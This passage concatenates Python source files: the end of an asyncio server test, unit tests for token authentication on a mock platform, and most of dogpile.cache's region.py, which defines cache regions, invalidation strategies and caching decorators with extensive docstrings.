loop.run_until_complete(events.AbstractServer().wait_closed())
def test_get_loop(self):
with self.assertRaises(NotImplementedError):
events.AbstractServer().get_loop()
if __name__ == '__main__':
unittest.main()
|
test_platform.py
|
from unittest.mock import Mock, patch
from threading import Thread
from . import MockPlatform
AUTHENTICATION_COUNT = 10
def test_whenTokenIsSetAndNotExpired_thenIsAuthenticated():
platform = MockPlatform()
platform._authenticate()
assert platform._is_authenticated()
def test_whenTokenIsNotSet_thenIsNotAuthenticated():
platform = MockPlatform()
platform._authenticate()
platform.access_token = None
assert not platform._is_authenticated()
def test_whenTokenIsExpired_thenIsNotAuthenticated():
platform = MockPlatform()
platform._authenticate()
platform.expires_at = 0
assert not platform._is_authenticated()
def test_whenAuthenticatingManyTimesSimultaniously_thenIsAuthenticatedOnce():
platform = MockPlatform()
access_token_setter = Mock(wraps=MockPlatform.access_token.fset)
mock = MockPlatform.access_token.setter(access_token_setter)
with patch.object(MockPlatform, 'access_token', mock):
def task(p):
p._authenticate()
threads = []
for _ in range(AUTHENTICATION_COUNT):
t = Thread(target=task, args=[platform], group=None)
t.start()
threads.append(t)
for thread in threads:
thread.join()
access_token_setter.assert_called_once()
|
region.py
|
from __future__ import with_statement
from .. import Lock, NeedRegenerationException
from ..util import NameRegistry
from . import exception
from ..util import PluginLoader, memoized_property, coerce_string_conf
from .util import function_key_generator, function_multi_key_generator
from .api import NO_VALUE, CachedValue
from .proxy import ProxyBackend
from ..util import compat
import time
import datetime
from numbers import Number
from functools import wraps
import threading
_backend_loader = PluginLoader("dogpile.cache")
register_backend = _backend_loader.register
from . import backends # noqa
value_version = 1
"""An integer placed in the :class:`.CachedValue`
so that new versions of dogpile.cache can detect cached
values from a previous, backwards-incompatible version.
"""
class RegionInvalidationStrategy(object):
"""Region invalidation strategy interface
Implement this interface and pass implementation instance
to :meth:`.CacheRegion.configure` to override default region invalidation.
Example::
class CustomInvalidationStrategy(RegionInvalidationStrategy):
def __init__(self):
self._soft_invalidated = None
self._hard_invalidated = None
def invalidate(self, hard=None):
if hard:
self._soft_invalidated = None
self._hard_invalidated = time.time()
else:
self._soft_invalidated = time.time()
self._hard_invalidated = None
def is_invalidated(self, timestamp):
return ((self._soft_invalidated and
timestamp < self._soft_invalidated) or
(self._hard_invalidated and
timestamp < self._hard_invalidated))
def was_hard_invalidated(self):
return bool(self._hard_invalidated)
def is_hard_invalidated(self, timestamp):
return (self._hard_invalidated and
timestamp < self._hard_invalidated)
def was_soft_invalidated(self):
return bool(self._soft_invalidated)
def is_soft_invalidated(self, timestamp):
return (self._soft_invalidated and
timestamp < self._soft_invalidated)
The custom implementation is injected into a :class:`.CacheRegion`
at configure time using the
:paramref:`.CacheRegion.configure.region_invalidator` parameter::
region = CacheRegion()
region = region.configure(region_invalidator=CustomInvalidationStrategy())
Invalidation strategies that wish to have access to the
:class:`.CacheRegion` itself should construct the invalidator given the
region as an argument::
class MyInvalidator(RegionInvalidationStrategy):
def __init__(self, region):
self.region = region
# ...
# ...
region = CacheRegion()
region = region.configure(region_invalidator=MyInvalidator(region))
.. versionadded:: 0.6.2
.. seealso::
:paramref:`.CacheRegion.configure.region_invalidator`
"""
def invalidate(self, hard=True):
"""Region invalidation.
:class:`.CacheRegion` propagated call.
The default invalidation system works by setting
a current timestamp (using ``time.time()``) to consider all older
timestamps effectively invalidated.
"""
raise NotImplementedError()
def is_hard_invalidated(self, timestamp):
"""Check timestamp to determine if it was hard invalidated.
:return: Boolean. True if ``timestamp`` is older than
the last region invalidation time and region is invalidated
in hard mode.
"""
raise NotImplementedError()
def is_soft_invalidated(self, timestamp):
"""Check timestamp to determine if it was soft invalidated.
:return: Boolean. True if ``timestamp`` is older than
the last region invalidation time and region is invalidated
in soft mode.
"""
raise NotImplementedError()
def is_invalidated(self, timestamp):
"""Check timestamp to determine if it was invalidated.
:return: Boolean. True if ``timestamp`` is older than
the last region invalidation time.
"""
raise NotImplementedError()
def was_soft_invalidated(self):
"""Indicate the region was invalidated in soft mode.
:return: Boolean. True if region was invalidated in soft mode.
"""
raise NotImplementedError()
def was_hard_invalidated(self):
"""Indicate the region was invalidated in hard mode.
:return: Boolean. True if region was invalidated in hard mode.
"""
raise NotImplementedError()
class DefaultInvalidationStrategy(RegionInvalidationStrategy):
def __init__(self):
self._is_hard_invalidated = None
self._invalidated = None
def invalidate(self, hard=True):
self._is_hard_invalidated = bool(hard)
self._invalidated = time.time()
def is_invalidated(self, timestamp):
return (self._invalidated is not None and
timestamp < self._invalidated)
def was_hard_invalidated(self):
return self._is_hard_invalidated is True
def is_hard_invalidated(self, timestamp):
return self.was_hard_invalidated() and self.is_invalidated(timestamp)
def was_soft_invalidated(self):
return self._is_hard_invalidated is False
def is_soft_invalidated(self, timestamp):
return self.was_soft_invalidated() and self.is_invalidated(timestamp)
class CacheRegion(object):
"""A front end to a particular cache backend.
:param name: Optional, a string name for the region.
This isn't used internally
but can be accessed via the ``.name`` parameter, helpful
for configuring a region from a config file.
:param function_key_generator: Optional. A
function that will produce a "cache key" given
a data creation function and arguments, when using
the :meth:`.CacheRegion.cache_on_arguments` method.
The structure of this function
should be two levels: given the data creation function,
return a new function that generates the key based on
the given arguments. Such as::
def my_key_generator(namespace, fn, **kw):
fname = fn.__name__
def generate_key(*arg):
return namespace + "_" + fname + "_".join(str(s) for s in arg)
return generate_key
region = make_region(
function_key_generator = my_key_generator
).configure(
"dogpile.cache.dbm",
expiration_time=300,
arguments={
"filename":"file.dbm"
}
)
The ``namespace`` is that passed to
:meth:`.CacheRegion.cache_on_arguments`. It's not consulted
outside this function, so in fact can be of any form.
For example, it can be passed as a tuple, used to specify
arguments to pluck from \**kw::
def my_key_generator(namespace, fn):
def generate_key(*arg, **kw):
return ":".join(
[kw[k] for k in namespace] +
[str(x) for x in arg]
)
return generate_key
Where the decorator might be used as::
@my_region.cache_on_arguments(namespace=('x', 'y'))
def my_function(a, b, **kw):
return my_data()
.. seealso::
:func:`.function_key_generator` - default key generator
:func:`.kwarg_function_key_generator` - optional gen that also
uses keyword arguments
:param function_multi_key_generator: Optional.
Similar to ``function_key_generator`` parameter, but it's used in
:meth:`.CacheRegion.cache_multi_on_arguments`. Generated function
should return list of keys. For example::
def my_multi_key_generator(namespace, fn, **kw):
namespace = fn.__name__ + (namespace or '')
def generate_keys(*args):
return [namespace + ':' + str(a) for a in args]
return generate_keys
:param key_mangler: Function which will be used on all incoming
keys before passing to the backend. Defaults to ``None``,
in which case the key mangling function recommended by
the cache backend will be used. A typical mangler
is the SHA1 mangler found at :func:`.sha1_mangle_key`
which coerces keys into a SHA1
hash, so that the string length is fixed. To
disable all key mangling, set to ``False``. Another typical
mangler is the built-in Python function ``str``, which can be used
to convert non-string or Unicode keys to bytestrings, which is
needed when using a backend such as bsddb or dbm under Python 2.x
in conjunction with Unicode keys.
:param async_creation_runner: A callable that, when specified,
will be passed to and called by dogpile.lock when
there is a stale value present in the cache. It will be passed the
mutex and is responsible releasing that mutex when finished.
This can be used to defer the computation of expensive creator
functions to later points in the future by way of, for example, a
background thread, a long-running queue, or a task manager system
like Celery.
For a specific example using async_creation_runner, new values can
be created in a background thread like so::
import threading
def async_creation_runner(cache, somekey, creator, mutex):
''' Used by dogpile.core:Lock when appropriate '''
def runner():
try:
value = creator()
cache.set(somekey, value)
finally:
mutex.release()
thread = threading.Thread(target=runner)
thread.start()
region = make_region(
async_creation_runner=async_creation_runner,
).configure(
'dogpile.cache.memcached',
expiration_time=5,
arguments={
'url': '127.0.0.1:11211',
'distributed_lock': True,
}
)
Remember that the first request for a key with no associated
value will always block; async_creator will not be invoked.
However, subsequent requests for cached-but-expired values will
still return promptly. They will be refreshed by whatever
asynchronous means the provided async_creation_runner callable
implements.
By default the async_creation_runner is disabled and is set
to ``None``.
.. versionadded:: 0.4.2 added the async_creation_runner
feature.
"""
def __init__(
self,
name=None,
function_key_generator=function_key_generator,
function_multi_key_generator=function_multi_key_generator,
key_mangler=None,
async_creation_runner=None,
):
"""Construct a new :class:`.CacheRegion`."""
self.name = name
self.function_key_generator = function_key_generator
self.function_multi_key_generator = function_multi_key_generator
self.key_mangler = self._user_defined_key_mangler = key_mangler
self.async_creation_runner = async_creation_runner
self.region_invalidator = DefaultInvalidationStrategy()
def configure(
self, backend,
expiration_time=None,
arguments=None,
_config_argument_dict=None,
_config_prefix=None,
wrap=None,
replace_existing_backend=False,
region_invalidator=None
):
"""Configure a :class:`.CacheRegion`.
The :class:`.CacheRegion` itself
is returned.
:param backend: Required. This is the name of the
:class:`.CacheBackend` to use, and is resolved by loading
the class from the ``dogpile.cache`` entrypoint.
:param expiration_time: Optional. The expiration time passed
to the dogpile system. May be passed as an integer number
of seconds, or as a ``datetime.timedelta`` value.
.. versionadded 0.5.0
``expiration_time`` may be optionally passed as a
``datetime.timedelta`` value.
The :meth:`.CacheRegion.get_or_create`
method as well as the :meth:`.CacheRegion.cache_on_arguments`
decorator (though note: **not** the :meth:`.CacheRegion.get`
method) will call upon the value creation function after this
time period has passed since the last generation.
:param arguments: Optional. The structure here is passed
directly to the constructor of the :class:`.CacheBackend`
in use, though is typically a dictionary.
:param wrap: Optional. A list of :class:`.ProxyBackend`
classes and/or instances, each of which will be applied
in a chain to ultimately wrap the original backend,
so that custom functionality augmentation can be applied.
.. versionadded:: 0.5.0
.. seealso::
:ref:`changing_backend_behavior`
:param replace_existing_backend: if True, the existing cache backend
will be replaced. Without this flag, an exception is raised if
a backend is already configured.
.. versionadded:: 0.5.7
:param region_invalidator: Optional. Override default invalidation
strategy with custom implementation of
:class:`.RegionInvalidationStrategy`.
.. versionadded:: 0.6.2
"""
if "backend" in self.__dict__ and not replace_existing_backend:
raise exception.RegionAlreadyConfigured(
"This region is already "
"configured with backend: %s. "
"Specify replace_existing_backend=True to replace."
% self.backend)
try:
backend_cls = _backend_loader.load(backend)
except PluginLoader.NotFound:
raise exception.PluginNotFound(
"Couldn't find cache plugin to load: %s" % backend)
if _config_argument_dict:
self.backend = backend_cls.from_config_dict(
_config_argument_dict,
_config_prefix
)
else:
self.backend = backend_cls(arguments or {})
if not expiration_time or isinstance(expiration_time, Number):
self.expiration_time = expiration_time
elif isinstance(expiration_time, datetime.timedelta):
self.expiration_time = int(
compat.timedelta_total_seconds(expiration_time))
else:
raise exception.ValidationError(
'expiration_time is not a number or timedelta.')
if not self._user_defined_key_mangler:
self.key_mangler = self.backend.key_mangler
self._lock_registry = NameRegistry(self._create_mutex)
if getattr(wrap, '__iter__', False):
for wrapper in reversed(wrap):
self.wrap(wrapper)
if region_invalidator:
self.region_invalidator = region_invalidator
return self
def wrap(self, proxy):
''' Takes a ProxyBackend instance or class and wraps the
attached backend. '''
# if we were passed a type rather than an instance then
# initialize it.
if type(proxy) == type:
proxy = proxy()
if not issubclass(type(proxy), ProxyBackend):
raise TypeError("Type %s is not a valid ProxyBackend"
% type(proxy))
self.backend = proxy.wrap(self.backend)
def _mutex(self, key):
return self._lock_registry.get(key)
class _LockWrapper(object):
"""weakref-capable wrapper for threading.Lock"""
def __init__(self):
self.lock = threading.Lock()
def acquire(self, wait=True):
return self.lock.acquire(wait)
def release(self):
self.lock.release()
def _create_mutex(self, key):
mutex = self.backend.get_mutex(key)
if mutex is not None:
return mutex
else:
return self._LockWrapper()
# cached value
_actual_backend = None
@property
def actual_backend(self):
"""Return the ultimate backend underneath any proxies.
The backend might be the result of one or more ``proxy.wrap``
applications. If so, derive the actual underlying backend.
.. versionadded:: 0.6.6
"""
if self._actual_backend is None:
_backend = self.backend
while hasattr(_backend, 'proxied'):
_backend = _backend.proxied
self._actual_backend = _backend
return self._actual_backend
def invalidate(self, hard=True):
"""Invalidate this :class:`.CacheRegion`.
The default invalidation system works by setting
a current timestamp (using ``time.time()``)
representing the "minimum creation time" for
a value. Any retrieved value whose creation
time is prior to this timestamp
is considered to be stale. It does not
affect the data in the cache in any way, and is
**local to this instance of :class:`.CacheRegion`.**
.. warning::
The :meth:`.CacheRegion.invalidate` method's default mode of
operation is to set a timestamp **local to this CacheRegion
in this Python process only**. It does not impact other Python
processes or regions as the timestamp is **only stored locally in
memory**. To implement invalidation where the
timestamp is stored in the cache or similar so that all Python
processes can be affected by an invalidation timestamp, implement a
custom :class:`.RegionInvalidationStrategy`.
Once set, the invalidation time is honored by
the :meth:`.CacheRegion.get_or_create`,
:meth:`.CacheRegion.get_or_create_multi` and
:meth:`.CacheRegion.get` methods.
The method supports both "hard" and "soft" invalidation
options. With "hard" invalidation,
:meth:`.CacheRegion.get_or_create` will force an immediate
regeneration of the value which all getters will wait for.
With "soft" invalidation, subsequent getters will return the
"old" value until the new one is available.
Usage of "soft" invalidation requires that the region or the method
is given a non-None expiration time.
.. versionadded:: 0.3.0
:param hard: if True, cache values will all require immediate
regeneration; dogpile logic won't be used. If False, the
creation time of existing values will be pushed back before
the expiration time so that a return+regen will be invoked.
.. versionadded:: 0.5.1
"""
self.region_invalidator.invalidate(hard)
def configure_from_config(self, config_dict, prefix):
"""Configure from a configuration dictionary
and a prefix.
Example::
local_region = make_region()
memcached_region = make_region()
# regions are ready to use for function
# decorators, but not yet for actual caching
# later, when config is available
myconfig = {
"cache.local.backend":"dogpile.cache.dbm",
"cache.local.arguments.filename":"/path/to/dbmfile.dbm",
"cache.memcached.backend":"dogpile.cache.pylibmc",
"cache.memcached.arguments.url":"127.0.0.1, 10.0.0.1",
}
local_region.configure_from_config(myconfig, "cache.local.")
memcached_region.configure_from_config(myconfig,
"cache.memcached.")
"""
config_dict = coerce_string_conf(config_dict)
return self.configure(
config_dict["%sbackend" % prefix],
expiration_time=config_dict.get(
"%sexpiration_time" % prefix, None),
_config_argument_dict=config_dict,
_config_prefix="%sarguments." % prefix,
wrap=config_dict.get(
"%swrap" % prefix, None),
replace_existing_backend=config_dict.get(
"%sreplace_existing_backend" % prefix, False),
)
@memoized_property
def backend(self):
raise exception.RegionNotConfigured(
"No backend is configured on this region.")
@property
def is_configured(self):
"""Return True if the backend has been configured via the
:meth:`.CacheRegion.configure` method already.
.. versionadded:: 0.5.1
"""
return 'backend' in self.__dict__
def get(self, key, expiration_time=None, ignore_expiration=False):
"""Return a value from the cache, based on the given key.
If the value is not present, the method returns the token
``NO_VALUE``. ``NO_VALUE`` evaluates to False, but is separate from
``None`` to distinguish between a cached value of ``None``.
By default, the configured expiration time of the
:class:`.CacheRegion`, or alternatively the expiration
time supplied by the ``expiration_time`` argument,
is tested against the creation time of the retrieved
value versus the current time (as reported by ``time.time()``).
If stale, the cached value is ignored and the ``NO_VALUE``
token is returned. Passing the flag ``ignore_expiration=True``
bypasses the expiration time check.
.. versionchanged:: 0.3.0
:meth:`.CacheRegion.get` now checks the value's creation time
against the expiration time, rather than returning
the value unconditionally.
The method also interprets the cached value in terms
of the current "invalidation" time as set by
the :meth:`.invalidate` method. If a value is present,
but its creation time is older than the current
invalidation time, the ``NO_VALUE`` token is returned.
Passing the flag ``ignore_expiration=True`` bypasses
the invalidation time check.
.. versionadded:: 0.3.0
Support for the :meth:`.CacheRegion.invalidate`
method.
:param key: Key to be retrieved. While it's typical for a key to be a
string, it is ultimately passed directly down to the cache backend,
before being optionally processed by the key_mangler function, so can
be of any type recognized by the backend or by the key_mangler
function, if present.
:param expiration_time: Optional expiration time value
which will supersede that configured on the :class:`.CacheRegion`
itself.
.. versionadded:: 0.3.0
:param ignore_expiration: if ``True``, the value is returned
from the cache if present, regardless of configured
expiration times or whether or not :meth:`.invalidate`
was called.
.. versionadded:: 0.3.0
"""
if self.key_mangler:
key = self.key_mangler(key)
value = self.backend.get(key)
value = self._unexpired_value_fn(
expiration_time, ignore_expiration)(value)
return value.payload
def _unexpired_value_fn(self, expiration_time, ignore_expiration):
if ignore_expiration:
return lambda value: value
else:
if expiration_time is None:
expiration_time = self.expiration_time
current_time = time.time()
def value_fn(value):
if value is NO_VALUE:
return value
elif expiration_time is not None and \
current_time - value.metadata["ct"] > expiration_time:
return NO_VALUE
elif self.region_invalidator.is_invalidated(
value.metadata["ct"]):
return NO_VALUE
else:
return value
return value_fn
def get_multi(self, keys, expiration_time=None, ignore_expiration=False):
"""Return multiple values from the cache, based on the given keys.
Returns values as a list matching the keys given.
E.g.::
values = region.get_multi(["one", "two", "three"])
To convert values to a dictionary, use ``zip()``::
keys = ["one", "two", "three"]
values = region.get_multi(keys)
dictionary = dict(zip(keys, values))
Keys which aren't present in the list are returned as
the ``NO_VALUE`` token. ``NO_VALUE`` evaluates to False,
but is separate from
``None`` to distinguish between a cached value of ``None``.
By default, the configured expiration time of the
:class:`.CacheRegion`, or alternatively the expiration
time supplied by the ``expiration_time`` argument,
is tested against the creation time of the retrieved
value versus the current time (as reported by ``time.time()``).
If stale, the cached value is ignored and the ``NO_VALUE``
token is returned. Passing the flag ``ignore_expiration=True``
bypasses the expiration time check.
.. versionadded:: 0.5.0
"""
if not keys:
return []
if self.key_mangler:
keys = list(map(lambda key: self.key_mangler(key), keys))
backend_values = self.backend.get_multi(keys)
_unexpired_value_fn = self._unexpired_value_fn(
expiration_time, ignore_expiration)
return [
value.payload if value is not NO_VALUE else value
for value in
(
_unexpired_value_fn(value) for value in
backend_values
)
]
def get_or_create(
self, key, creator, expiration_time=None, should_cache_fn=None):
"""Return a cached value based on the given key.
If the value does not exist or is considered to be expired
based on its creation time, the given
creation function may or may not be used to recreate the value
and persist the newly generated value in the cache.
Whether or not the function is used depends on if the
*dogpile lock* can be acquired or not. If it can't, it means
a different thread or process is already running a creation
function for this key against the cache. When the dogpile
lock cannot be acquired, the method will block if no
previous value is available, until the lock is released and
a new value available. If a previous value
is available, that value is returned immediately without blocking.
If the :meth:`.invalidate` method has been called, and
the retrieved value's timestamp is older than the invalidation
timestamp, the value is unconditionally prevented from
being returned. The method will attempt to acquire the dogpile
lock to generate a new value, or will wait
until the lock is released to return the new value.
.. versionchanged:: 0.3.0
The value is unconditionally regenerated if the creation
time is older than the last call to :meth:`.invalidate`.
:param key: Key to be retrieved. While it's typical for a key to be a
string, it is ultimately passed directly down to the cache backend,
before being optionally processed by the key_mangler function, so can
be of any type recognized by the backend or by the key_mangler
function, if present.
:param creator: function which creates a new value.
:param expiration_time: optional expiration time which will overide
the expiration time already configured on this :class:`.CacheRegion`
if not None. To set no expiration, use the value -1.
:param should_cache_fn: optional callable function which will receive
the value returned by the "creator", and will then return True or
False, indicating if the value should actually be cached or not. If
it returns False, the value is still returned, but isn't cached.
E.g.::
def dont_cache_none(value):
return value is not None
value = region.get_or_create("some key",
create_value,
should_cache_fn=dont_cache_none)
Above, the function returns the value of create_value() if
the cache is invalid, however if the return value is None,
it won't be cached.
.. versionadded:: 0.4.3
.. seealso::
:meth:`.CacheRegion.cache_on_arguments` - applies
:meth:`.get_or_create` to any function using a decorator.
:meth:`.CacheRegion.get_or_create_multi` - multiple key/value
version
"""
orig_key = key
if self.key_mangler:
key = self.key_mangler(key)
def get_value():
value = self.backend.get(key)
if (value is NO_VALUE or value.metadata['v'] != value_version or
self.region_invalidator.is_hard_invalidated(
value.metadata["ct"])):
raise NeedRegenerationException()
ct = value.metadata["ct"]
if self.region_invalidator.is_soft_invalidated(ct):
ct = time.time() - expiration_time - .0001
return value.payload, ct
def gen_value():
created_value = creator()
value = self._value(created_value)
if not should_cache_fn or \
should_cache_fn(created_value):
self.backend.set(key, value)
return value.payload, value.metadata["ct"]
if expiration_time is None:
expiration_time = self.expiration_time
if (expiration_time is None and
self.region_invalidator.was_soft_invalidated()):
raise exception.DogpileCacheException(
"Non-None expiration time required "
"for soft invalidation")
if expiration_time == -1:
expiration_time = None
if self.async_creation_runner:
def async_creator(mutex):
return self.async_creation_runner(
self, orig_key, creator, mutex)
else:
async_creator = None
with Lock(
self._mutex(key),
gen_value,
get_value,
expiration_time,
async_creator) as value:
return value
def get_or_create_multi(
self, keys, creator, expiration_time=None, should_cache_fn=None):
"""Return a sequence of cached values based on a sequence of keys.
The behavior for generation of values based on keys corresponds
to that of :meth:`.Region.get_or_create`, with the exception that
the ``creator()`` function may be asked to generate any subset of
the given keys. The list of keys to be generated is passed to
``creator()``, and ``creator()`` should return the generated values
as a sequence corresponding to the order of the keys.
The method uses the same approach as :meth:`.Region.get_multi`
and :meth:`.Region.set_multi` to get and set values from the
backend.
If you are using a :class:`.CacheBackend` or :class:`.ProxyBackend`
that modifies values, take note this function invokes
``.set_multi()`` for newly generated values using the same values it
returns to the calling function. A correct implementation of
``.set_multi()`` will not modify values in-place on the submitted
``mapping`` dict.
:param keys: Sequence of keys to be retrieved.
:param creator: function which accepts a sequence of keys and
returns a sequence of new values.
:param expiration_time: optional expiration time which will overide
the expiration time already configured on this :class:`.CacheRegion`
if not None. To set no expiration, use the value -1.
:param should_cache_fn: optional callable function which will receive
each value returned by the "creator", and will then return True or
False, indicating if the value should actually be cached or not. If
it returns False, the value is still returned, but isn't cached.
.. versionadded:: 0.5.0
.. seealso::
:meth:`.CacheRegion.cache_multi_on_arguments`
:meth:`.CacheRegion.get_or_create`
"""
def get_value(key):
value = values.get(key, NO_VALUE)
if (value is NO_VALUE or value.metadata['v'] != value_version or
self.region_invalidator.is_hard_invalidated(
value.metadata['ct'])):
# dogpile.core understands a 0 here as
# "the value is not available", e.g.
# _has_value() will return False.
return value.payload, 0
else:
ct = value.metadata["ct"]
if self.region_invalidator.is_soft_invalidated(ct):
ct = time.time() - expiration_time - .0001
return value.payload, ct
def gen_value():
raise NotImplementedError()
def async_creator(key, mutex):
mutexes[key] = mutex
if expiration_time is None:
expiration_time = self.expiration_time
if (expiration_time is None and
self.region_invalidator.was_soft_invalidated()):
raise exception.DogpileCacheException(
"Non-None expiration time required "
"for soft invalidation")
if expiration_time == -1:
expiration_time = None
mutexes = {}
sorted_unique_keys = sorted(set(keys))
if self.key_mangler:
mangled_keys = [self.key_mangler(k) for k in sorted_unique_keys]
else:
mangled_keys = sorted_unique_keys
orig_to_mangled = dict(zip(sorted_unique_keys, mangled_keys))
values = dict(zip(mangled_keys, self.backend.get_multi(mangled_keys)))
for orig_key, mangled_key in orig_to_mangled.items():
with Lock(
self._mutex(mangled_key),
gen_value,
lambda: get_value(mangled_key),
expiration_time,
async_creator=lambda mutex: async_creator(orig_key, mutex)
):
pass
try:
if mutexes:
# sort the keys, the idea is to prevent deadlocks.
# though haven't been able to simulate one anyway.
keys_to_get = sorted(mutexes)
new_values = creator(*keys_to_get)
values_w_created = dict(
(orig_to_mangled[k], self._value(v))
for k, v in zip(keys_to_get, new_values)
)
if not should_cache_fn:
self.backend.set_multi(values_w_created)
else:
values_to_cache = dict(
(k, v)
for k, v in values_w_created.items()
if should_cache_fn(v[0])
)
if values_to_cache:
self.backend.set_multi(values_to_cache)
values.update(values_w_created)
return [values[orig_to_mangled[k]].payload for k in keys]
finally:
for mutex in mutexes.values():
mutex.release()
def _value(self, value):
"""Return a :class:`.CachedValue` given a value."""
return CachedValue(
value,
{
"ct": time.time(),
"v": value_version
})
def set(self, key, value):
"""Place a new value in the cache under the given key."""
if self.key_mangler:
key = self.key_mangler(key)
self.backend.set(key, self._value(value))
def set_multi(self, mapping):
"""Place new values in the cache under the given keys.
.. versionadded:: 0.5.0
"""
if not mapping:
return
if self.key_mangler:
mapping = dict((
self.key_mangler(k), self._value(v))
for k, v in mapping.items())
else:
mapping = dict((k, self._value(v)) for k, v in mapping.items())
self.backend.set_multi(mapping)
def delete(self, key):
"""Remove a value from the cache.
This operation is idempotent (can be called multiple times, or on a
non-existent key, safely)
"""
if self.key_mangler:
key = self.key_mangler(key)
self.backend.delete(key)
def delete_multi(self, keys):
"""Remove multiple values from the cache.
This operation is idempotent (can be called multiple times, or on a
non-existent key, safely)
.. versionadded:: 0.5.0
"""
if self.key_mangler:
keys = list(map(lambda key: self.key_mangler(key), keys))
self.backend.delete_multi(keys)
def cache_on_arguments(
self, namespace=None,
expiration_time=None,
should_cache_fn=None,
to_str=compat.string_type,
function_key_generator=None):
"""A function decorator that will cache the return
value of the function using a key derived from the
function itself and its arguments.
The decorator internally makes use of the
:meth:`.CacheRegion.get_or_create` method to access the
cache and conditionally call the function. See that
method for additional behavioral details.
E.g.::
@someregion.cache_on_arguments()
def generate_something(x, y):
return somedatabase.query(x, y)
The decorated function can then be called normally, where
data will be pulled from the cache region unless a new
value is needed::
result = generate_something(5, 6)
The function is also given an attribute ``invalidate()``, which
provides for invalidation of the value. Pass to ``invalidate()``
the same arguments you'd pass to the function itself to represent
a particular value::
generate_something.invalidate(5, 6)
Another attribute ``set()`` is added to provide extra caching
possibilities relative to the function. This is a convenience
method for :meth:`.CacheRegion.set` which will store a given
value directly without calling the decorated function.
The value to be cached is passed as the first argument, and the
arguments which would normally be passed to the function
should follow::
generate_something.set(3, 5, 6)
The above example is equivalent to calling
``generate_something(5, 6)``, if the function were to produce
the value ``3`` as the value to be cached.
.. versionadded:: 0.4.1 Added ``set()`` method to decorated function.
Similar to ``set()`` is ``refresh()``. This attribute will
invoke the decorated function and populate a new value into
the cache with the new value, as well as returning that value::
newvalue = generate_something.refresh(5, 6)
.. versionadded:: 0.5.0 Added ``refresh()`` method to decorated
function.
``original()`` on other hand will invoke the decorated function
without any caching::
newvalue = generate_something.original(5, 6)
.. versionadded:: 0.6.0 Added ``original()`` method to decorated
function.
Lastly, the ``get()`` method returns either the value cached
for the given key, or the token ``NO_VALUE`` if no such key
exists::
value = generate_something.get(5, 6)
.. versionadded:: 0.5.3 Added ``get()`` method to decorated
function.
The default key generation will use the name
of the function, the module name for the function,
the arguments passed, as well as an optional "namespace"
parameter in order to generate a cache key.
Given a function ``one`` inside the module
``myapp.tools``::
@region.cache_on_arguments(namespace="foo")
def one(a, b):
return a + b
Above, calling ``one(3, 4)`` will produce a
cache key as follows::
myapp.tools:one|foo|3 4
The key generator will ignore an initial argument
of ``self`` or ``cls``, making the decorator suitable
(with caveats) for use with instance or class methods.
Given the example::
class MyClass(object):
@region.cache_on_arguments(namespace="foo")
def one(self, a, b):
return a + b
The cache key above for ``MyClass().one(3, 4)`` will
again produce the same cache key of ``myapp.tools:one|foo|3 4`` -
the name ``self`` is skipped.
The ``namespace`` parameter is optional, and is used
normally to disambiguate two functions of the same
name within the same module, as can occur when decorating
instance or class methods as below::
class MyClass(object):
@region.cache_on_arguments(namespace='MC')
def somemethod(self, x, y):
""
class MyOtherClass(object):
@region.cache_on_arguments(namespace='MOC')
def somemethod(self, x, y):
""
Above, the ``namespace`` parameter disambiguates
between ``somemethod`` on ``MyClass`` and ``MyOtherClass``.
Python class declaration mechanics otherwise prevent
the decorator from having awareness of the ``MyClass``
and ``MyOtherClass`` names, as the function is received
by the decorator before it becomes an instance method.
The function key generation can be entirely replaced
on a per-region basis using the ``function_key_generator``
argument present on :func:`.make_region` and
:class:`.CacheRegion`. If defaults to
:func:`.function_key_generator`.
:param namespace: optional string argument which will be
established as part of the cache key. This may be needed
to disambiguate functions of the same name within the same
source file, such as those
associated with classes - note that the decorator itself
can't see the parent class on a function as the class is
being declared.
:param expiration_time: if not None, will override the normal
expiration time.
May be specified as a callable, taking no arguments, that
returns a value to be used as the ``expiration_time``. This callable
will be called whenever the decorated function itself is called, in
caching or retrieving. Thus, this can be used to
determine a *dynamic* expiration time for the cached function
result. Example use cases include "cache the result until the
end of the day, week or time period" and "cache until a certain date
or time passes".
.. versionchanged:: 0.5.0
``expiration_time`` may be passed as a callable to
:meth:`.CacheRegion.cache_on_arguments`.
:param should_cache_fn: passed to :meth:`.CacheRegion.get_or_create`.
.. versionadded:: 0.4.3
:param to_str: callable, will be called on each function argument
in order to convert to a string. Defaults to ``str()``. If the
function accepts non-ascii unicode arguments on Python 2.x, the
``unicode()`` builtin can be substituted, but note this will
produce unicode cache keys which may require key mangling before
reaching the cache.
.. versionadded:: 0.5.0
:param function_key_generator: a function that will produce a
"cache key". This function will supersede the one configured on the
:class:`.CacheRegion` itself.
.. versionadded:: 0.5.5
.. seealso::
:meth:`.CacheRegion.cache_multi_on_arguments`
:meth:`.CacheRegion.get_or_create`
"""
expiration_time_is_callable = compat.callable(expiration_time)
if function_key_generator is None:
function_key_generator = self.function_key_generator
def decorator(fn):
if to_str is compat.string_type:
# backwards compatible
key_generator = function_key_generator(namespace, fn)
else:
key_generator = function_key_generator(
namespace, fn,
to_str=to_str)
@wraps(fn)
def decorate(*arg, **kw):
key = key_generator(*arg, **kw)
@wraps(fn)
def creator():
return fn(*arg, **kw)
timeout = expiration_time() if expiration_time_is_callable \
else expiration_time
return self.get_or_create(key, creator, timeout,
should_cache_fn)
def invalidate(*arg, **kw):
key = key_generator(*arg, **kw)
self.delete(key)
def set_(value, *arg, **kw):
key = key_generator(*arg, **kw)
self.set(key, value)
def get(*arg, **kw):
key = key_generator(*arg, **kw)
return self.get(key)
def refresh(*arg, **kw):
key = key_generator(*arg, **kw)
value = fn(*arg, **kw)
self.set(key, value)
return value
decorate.set = set_
decorate.invalidate = invalidate
decorate.refresh = refresh
decorate.get = get
decorate.original = fn
return decorate
return decorator
def cache_multi_on_arguments(
self, namespace=None, expiration_time=None,
should_cache_fn=None,
asdict=False, to_str=compat.string_type,
function_multi_key_generator=None):
"""A function decorator that will cache multiple return
values from the function using a sequence of keys derived from the
function itself and the arguments passed to it.
This method is the "multiple key" analogue to the
:meth:`.CacheRegion.cache_on_arguments` method.
Example::
@someregion.cache_multi_on_arguments()
def generate_something(*keys):
return [
somedatabase.query(key)
for key in keys
]
The decorated function can be called normally. The decorator
will produce a list of cache keys using a mechanism similar to
that of :meth:`.CacheRegion.cache_on_arguments`, combining the
name of the function with the optional namespace and with the
string form of each key. It will then consult the cache using
the same mechanism as that of :meth:`.CacheRegion.get_multi`
to retrieve all current values; the originally passed keys
corresponding to those values which aren't generated or need
regeneration will be assembled into a new argument list, and
